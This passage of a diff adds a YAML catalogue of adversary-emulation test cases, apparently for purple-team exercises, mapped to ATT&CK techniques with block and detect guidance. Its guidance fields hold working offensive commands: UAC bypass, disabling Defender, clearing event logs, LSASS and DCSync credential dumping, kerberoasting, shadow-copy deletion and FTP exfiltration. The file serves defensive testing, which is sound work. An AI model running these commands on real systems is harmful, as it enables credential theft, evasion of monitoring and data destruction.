+  - Payload on disk triggers an alert with endpoint security tool
+  controls:
+  - Endpoint Protection
+  - Hardening
+  - SIEM
+  metadata:
+    id: a7134d71-dc49-41a8-a309-ec520c96a089
+    tid: T1221
+    tactic: TA0005
+    x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+    isv: 1
+Defense Evasion:
+- name: Load known-abusable kernel driver
+  description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+  platforms:
+  - windows
+  guidance:
+  - "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+  block:
+  - Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+  - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+  - https://www.loldrivers.io/
+  - Anomalous driver load blocked by endpoint security tool
+  detect:
+  - Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+  controls:
+  - Hardening
+  - Endpoint Protection
+  metadata:
+    id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+    tid: T1014
+    tactic: TA0005
+    x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+    isv: 1
+- name: Sideload a DLL into a legitimate application
+  description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+  platforms:
+  - windows
+  guidance:
+  - "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 2496e250-5757-482f-9661-daea872395ae
+    tid: T1574.002
+    tactic: TA0005
+    x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+    isv: 1
+- name: DLL execution using Rundll32
+  description: Execute a malicious DLL's function directly using rundll32
+  platforms:
+  - windows
+  guidance:
+  - cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Payload on disk deleted/quarantined by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 940be4b6-6081-4808-ab64-aceadfeb3792
+    tid: T1218.011
+    tactic: TA0005
+    x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+    isv: 1
+- name: Bypass User Account Control (UAC) via fodhelper
+  description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+  platforms:
+  - windows
+  guidance:
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+  - cmd> c:\windows\system32\fodhelper.exe
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+    tid: T1548.002
+    tactic: TA0004
+    x_references:
+    - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+    x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+    isv: 1
+- name: Clear Windows Event Log entries
+  description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+  platforms:
+  - windows
+  guidance:
+  - CMD> wevtutil clear-log Security
+  - CMD> wevtutil clear-log Application
+  - CMD> wevtutil clear-log System
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+    tid: T1070.001
+    tactic: TA0005
+    x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+    isv: 1
+- name: Certutil decode Base64 encoded payload
+  description: Use certutil.exe to decode an encoded payload file
+  platforms:
+  - windows
+  guidance:
+  - cmd> certutil -decode {{ infile_name }} {{ outfile_name }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 9dbfedcf-893f-4086-b428-2f3bc73c96a5
+    tid: T1140
+    tactic: TA0005
+    x_vectr_id: 9dbfedcf-893f-4086-b428-2f3bc73c96a5
+    isv: 1
+- name: Disable Windows Defender via PowerShell
+  description: Use PowerShell's Set-MpPreference to disable Windows Defender
+  platforms:
+  - windows
+  guidance:
+  - PS> Set-MpPreference -DisableBehaviorMonitoring $true
+  - PS> Set-MpPreference -DisableRealtimeMonitoring $true
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: cb3ea139-979c-438a-9cf7-611b985f4d61
+    tid: T1562.001
+    tactic: TA0005
+    x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+    isv: 1
+- name: Modify identity policy in IdP
+  description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+  controls:
+  - SIEM
+  metadata:
+    id: cbd9070f-03fa-455f-af46-99e8d41146ac
+    tid: T1484
+    tactic: TA0003
+    x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+    isv: 1
+Discovery:
+- name: Domain Controller discovery via nltest
+  description: Use nltest.exe to identify domain controllers in the domain
+  platforms:
+  - windows
+  guidance:
+  - cmd> nltest.exe /dclist:{{ domain }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+    tid: T1018
+    tactic: TA0007
+    x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+    isv: 1
+- name: Domain trust discovery via nltest
+  description: Identify domain trust relationships using nltest.exe
+  platforms:
+  - windows
+  guidance:
+  - cmd> nltest.exe /domain_trusts /all_trusts
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+    tid: T1482
+    tactic: TA0007
+    x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+    isv: 1
+- name: Internal network scan using Net Scan
+  description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+  platforms:
+  - windows
+  guidance:
+  - cmd> {{ netscan_binary }}
+  block:
+  - Network security controls block source generating a large volume of connection requests
+  - Block the installation and use of unapproved third-party utilities via application control software
+  detect:
+  - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+  controls:
+  - ID/PS
+  - Firewall
+  - SIEM
+  - Application Control
+  metadata:
+    id: 3f120c23-78c0-462f-808f-38ef4f607233
+    tid: T1046
+    tactic: TA0007
+    x_tools:
+    - https://www.softperfect.com/products/networkscanner/
+    x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+    isv: 1
+- name: Enumerate domain groups and users using net
+  description: Enumerate domain users and domain groups using the builtin net.exe
+  platforms:
+  - windows
+  guidance:
+  - cmd> net user /domain
+  - cmd> net group /domain
+  - cmd> net group "Domain Admins" /domain
+  - cmd> net group "Domain Computers" /domain
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+    tid: T1087.002
+    tactic: TA0007
+    x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+    isv: 1
+- name: BloodHound DC enumeration
+  description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+  platforms:
+  guidance:
+  - cmd> SharpHound.exe -c DcOnly
+  block:
+  - ''
+  detect:
+  - Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+  - Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+  - https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: 672f8861-c914-4f58-b861-5107ce19f61c
+    tid: T1087.002
+    tactic: TA0007
+    x_tools:
+    - https://github.com/BloodHoundAD/SharpHound
+    x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+    isv: 1
+- name: Retrieve system information
+  description: Retrieve information about the system using multiple builtin commands
+  platforms:
+  - windows
+  guidance:
+  - CMD> systeminfo ipconfig tasklist sc query wmic product get
+  block:
+  - ''
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 9064e91a-be78-48a5-9112-28d5701d6d51
+    tid: T1082
+    tactic: TA0007
+    x_vectr_id: 9064e91a-be78-48a5-9112-28d5701d6d51
+    isv: 1
+Command and Control:
+- name: HTTP C2 over tcp/80
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+    tid: T1071.001
+    tactic: TA0011
+    x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+    isv: 1
+- name: HTTPS C2 over tcp/443
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 3ed2f449-744b-48c3-80d2-854386e446a0
+    tid: T1071.001
+    tactic: TA0011
+    x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+    isv: 1
+- name: Access via remote assistance tool
+  description: Establish connection to system using a legitimate remote assistance application
+  platforms:
+  guidance:
+  block:
+  - Block the installation and use of unapproved third-party utilities via application control software
+  - Connections to known remote access service domains/IPs are blocked
+  - Remote access connection attempts originating from users outside of the tenant are blocked
+  detect:
+  - Connections to known remote access service domains/IPs are detected
+  controls:
+  - Application Control
+  - ID/PS
+  - Firewall
+  metadata:
+    id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+    tid: T1219
+    tactic: TA0011
+    x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+    isv: 1
+- name: Remote tool download over HTTP
+  description: Download a tool from a public hosting location onto the victim system
+  platforms:
+  guidance:
+  block:
+  - Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+  detect:
+  - Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+    tid: T1105
+    tactic: TA0011
+    x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+    isv: 1
+Collection:
+- name: Screen Capture
+  description: Capture an image of the user's screen
+  platforms:
+  guidance:
+  - "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 804512cc-4acf-4be3-a577-ce02ea723fab
+    tid: T1113
+    tactic: TA0009
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+    x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+    isv: 1
+- name: Keylogger
+  description: Log user keystrokes
+  platforms:
+  - windows
+  guidance:
+  - "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: be524cb1-12e6-4708-ad57-faf91dfad9de
+    tid: T1056.001
+    tactic: TA0009
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+    x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+    isv: 1
+Credential Access:
+- name: Extract domain user credentials via replication
+  description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+  platforms:
+  - windows
+  guidance:
+  - (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+  block:
+  - ''
+  detect:
+  - Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+  - https://blog.blacklanternsecurity.com/p/detecting-dcsync
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+    tid: T1003.006
+    tactic: TA0006
+    x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+    isv: 1
+- name: Extract Logonpasswords via Nanodump
+  description: Use nanodump to extract credentials from LSASS process memory
+  platforms:
+  - windows
+  guidance:
+  - cmd> nanodump.exe --duplicate -w {{ out_file }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  - Hardening
+  metadata:
+    id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+    tid: T1003.001
+    tactic: TA0006
+    x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+    isv: 1
+- name: Dump LSASS memory using builtin comsvcs.dll
+  description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+  platforms:
+  - windows
+  guidance:
+  - shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }}  full
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - SIEM
+  - Endpoint Protection
+  - Hardening
+  metadata:
+    id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+    tid: T1003.001
+    tactic: TA0006
+    x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+    isv: 1
+- name: Dump LSASS memory using Sysinternals ProcDump
+  description: Use ProcDump from Sysinternals to dump LSASS process memory
+  platforms:
+  - windows
+  guidance:
+  - CMD> procdump -ma lsass.exe dump
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  - Block the installation and use of unapproved third-party utilities via application control software
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - SIEM
+  - Endpoint Protection
+  - Hardening
+  - Application Control
+  metadata:
+    id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+    tid: T1003.001
+    tactic: TA0006
+    x_tools:
+    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+    x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+    isv: 1
+- name: Extract browser cookies
+  description: Extract cookie information from the user's browser
+  platforms:
+  - windows
+  guidance:
+  - cmd> SharpChrome.exe cookies
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 95790889-fb7d-42af-a221-3535e4197cde
+    tid: T1555.003
+    tactic: TA0006
+    x_tools:
+    - https://github.com/GhostPack/SharpDPAPI
+    x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+    isv: 1
+- name: Volumetric Kerberoasting
+  description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+  platforms:
+  guidance:
+  - cmd> Rubeus.exe kerberoast
+  block:
+  - ''
+  detect:
+  - 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+    tid: T1558.003
+    tactic: TA0006
+    x_tools:
+    - https://github.com/GhostPack/Rubeus
+    x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+    isv: 1
+- name: Enabled WDigest via Registry
+  description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+  platforms:
+  - windows
+  guidance:
+  - cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+  block:
+  - Suspicious Registry modification blocked by endpoint security tool
+  detect:
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+    tid: T1112
+    tactic: TA0005
+    x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+    isv: 1
+Impact:
+- name: Encrypt a large amount of files
+  description: Encrypt a large amount of files on the endpoint to simulate ransomware
+  platforms:
+  guidance:
+  - cmd> coldcryptor.exe run {{ extension }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Detect common ransomware extensions using file system telemetry
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+    tid: T1486
+    tactic: TA0040
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+    x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+    isv: 1
+- name: Delete shadows with vssadmin.exe
+  description: Delete volume shadow copies on the host to inhibit file system recovery
+  platforms:
+  - windows
+  guidance:
+  - CMD> vssadmin.exe delete shadows /all /quiet
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+    tid: T1490
+    tactic: TA0040
+    x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+    isv: 1
+- name: Modify group policy object
+  description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+  controls:
+  - SIEM
+  metadata:
+    id: 45591791-541b-4a27-bda9-75e6d78a66f4
+    tid: T1484.001
+    tactic: TA0005
+    x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+    isv: 1
+Exfiltration:
+- name: Extract sensitive data over HTTP
+  description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+  platforms:
+  guidance:
+  - http://dlptest.com/http-post/
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+    tid: T1048.003
+    tactic: TA0010
+    x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+    isv: 1
+- name: Extract sensitive data over FTP
+  description: Exfiltrate data from the internal network to an external system via FTP
+  platforms:
+  guidance:
+  - https://dlptest.com/ftp-test/
+  - shell> curl --ftp-create-dirs -T {{ local_file }} ftp://{{ username }}:{{ password }}@{{ server }}/{{ dest_path }}
+  block:
+  - Outbound connections over FTP are blocked by network security configurations
+  - Sensitive data sent over the network is blocked by network DLP tool
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - DLP
+  - Firewall
+  metadata:
+    id: 11b7a86e-4596-4df9-a2a9-705096756d28
+    tid: T1048.003
+    tactic: TA0010
+    x_vectr_id: 11b7a86e-4596-4df9-a2a9-705096756d28
+    isv: 1
+- name: Extract data to cloud storage service
+  description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+  platforms:
+  guidance:
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  - Network security tool detects connection to domain based on category from proxy or DNS
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+    tid: T1567.002
+    tactic: TA0010
+    x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+    isv: 1
+- name: Extract sensitive data over HTTP C2
+  description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+  platforms:
+  guidance:
+  - implant> download {{ file }}
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+    tid: T1041
+    tactic: TA0010
+    x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+    isv: 1
+Lateral Movement:
+- name: Lateral Movement via WMI
+  description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+  platforms:
+  - windows
+  guidance:
+  - CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+    tid: T1021.003
+    tactic: TA0008
+    x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+    isv: 1
+- name: Lateral Movement via PsExec
+  description: Move to another system by creating a service remotely via Sysinternals PsExec
+  platforms:
+  - windows
+  guidance:
+  - CMD> psexec -s \{{ target }} {{ command }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  - Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+    tid: T1021.002
+    tactic: TA0008
+    x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+    isv: 1
+- name: Lateral Movement via RDP
+  description: Perform an interactive logons to a Windows system via RDP
+  platforms:
+  - windows
+  guidance:
+  - CMD> mstsc /v:{{ target }}
+  block:
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+    tid: T1021.001
+    tactic: TA0008
+    x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+    isv: 1
+- name: Remote .exe copy
+  description: Copy an .exe payload to a temp folder on the remote target
+  platforms:
+  guidance:
+  - cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }}
+  block:
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - Antivirus
+  - SIEM
+  metadata:
+    id: b74ff4c5-eebf-466b-af85-341b19c4c748
+    tid: T1570
+    tactic: TA0008
+    x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748
+    isv: 1
+Persistence:
+- name: Persist via new scheduled task
+  description: Persist on a system by creating a new scheduled task
+  platforms:
+  - windows
+  guidance:
+  - cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 20a6dace-d801-42f5-b659-6cf91e39d273
+    tid: T1053.005
+    tactic: TA0003
+    x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+    isv: 1
+- name: Persist via new Windows service
+  description: Persist on a system by creating a new service
+  platforms:
+  - windows
+  guidance:
+  - CMD> sc create {{ service_name }} binPath= "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
